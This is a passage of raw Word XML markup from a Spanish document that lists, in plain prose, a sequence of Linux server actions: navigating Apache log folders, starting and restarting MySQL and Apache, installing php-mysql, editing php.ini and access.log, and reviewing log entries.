          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09BEBD" w14:textId="5881BE91" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se coloca en </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/apache2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE71E91" w14:textId="0478B57E" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lista el contenido de la carpeta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C8C93" w14:textId="25D75D12" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vuelve a mirar en que carpeta </w:t>
      </w:r>
      <w:r w:rsidR="00763EFB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> situado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF9AC76" w14:textId="521A3B27" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Crea la carpeta </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/run/mysqld</w:t>
      </w:r>
      <w:r w:rsidR="00763EFB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859E229" w14:textId="0078EBBC" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inicia el servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en modo seguro sin autenticación ejecutándose en segundo plano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46410C" w14:textId="265A5B09" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mata el procese 3181, sale de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">y reinicia </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A3077" w14:textId="29EB916D" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Instala php-</w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.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307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70622D87" w14:textId="7F3C5729" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este paquete proporciona un módulo </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>para PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01798E41" w14:textId="638EC2A0" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PHP (acrónimo recursivo de PHP: preprocesador de hipertexto) es un lenguaje de programación de código abierto de propósito general que es especialmente adecuado para desarrollo web y puede integrarse en HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5310FB" w14:textId="2F8C5F45" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Muestra la hora del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF3DF6" w14:textId="372FB0AF" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uestra archivos y carpetas de ap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B8BE00" w14:textId="3B9A0284" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Edita access.log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DEDF7" w14:textId="101FF879" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica los ficheros de configuración de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EE45D" w14:textId="70046BCA" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Arranca el servicio de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B9023" w14:textId="73A45A3C" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Edita php.ini de </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/etc/php/7.2/apache2/</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA56C12" w14:textId="0326A5D0" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mata el proceso 4178.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FFB2D" w14:textId="7CB3D355" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consulta los últimos 100 registros de access.log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3EB4D" w14:textId="466C5643" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vuelve a mostrar ficheros relativos a </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">y lista las 100 ultimas </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de sys.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F26CFD9" w14:textId="5D2A90FE" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Repite este paso 3 veces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00A0BB" w14:textId="54112F03" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
